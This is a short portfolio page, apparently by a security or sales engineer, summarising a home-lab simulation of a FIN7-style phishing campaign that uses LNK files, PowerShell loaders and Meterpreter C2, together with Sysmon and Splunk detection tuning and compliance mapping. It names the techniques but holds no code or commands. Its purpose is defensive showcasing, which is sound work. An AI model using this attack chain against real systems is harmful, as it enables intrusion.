POC #2: Endpoint Threat Detection Simulation

This simulation showcases how I uncover endpoint blind spots and translate advanced threat techniques into clear, actionable findings for security and sales teams alike. I engineered a phishing-to-C2 campaign inspired by FIN7 to assess detection gaps and communicate risk across Red, Blue, and Purple team functions.

✔ Red Team (Attack Simulation): Built a multi-stage phishing campaign using LNK payloads, PowerShell loaders, and Meterpreter C2 to emulate initial access and persistence (MITRE T1566.001, T1204, T1218).

✔ Blue Team (Detection Engineering): Tuned Sysmon and Splunk rules to reduce dwell time from undetected to a 1-minute alert and 5-minute containment window.

✔ Purple Team (Business Alignment): Quantified a $58K-per-incident risk reduction and mapped findings to NIST 800-53, ISO 27001, PCI-DSS, and GDPR.

Sales Engineering Impact

This lab helps me guide SMB prospects through real-world endpoint threats and clearly show how behavioral detections reduce dwell time, strengthen compliance, and deliver peace of mind.

Read the Reports

🔴 Red Team Report (LNK → PowerShell → C2)

🔵 Blue Team Report (Sysmon, Splunk, LimaCharlie)

🟣 Purple Team Report (Business Risk & Compliance Mapping)

⚙️ Setup Guide (Home Lab Environment)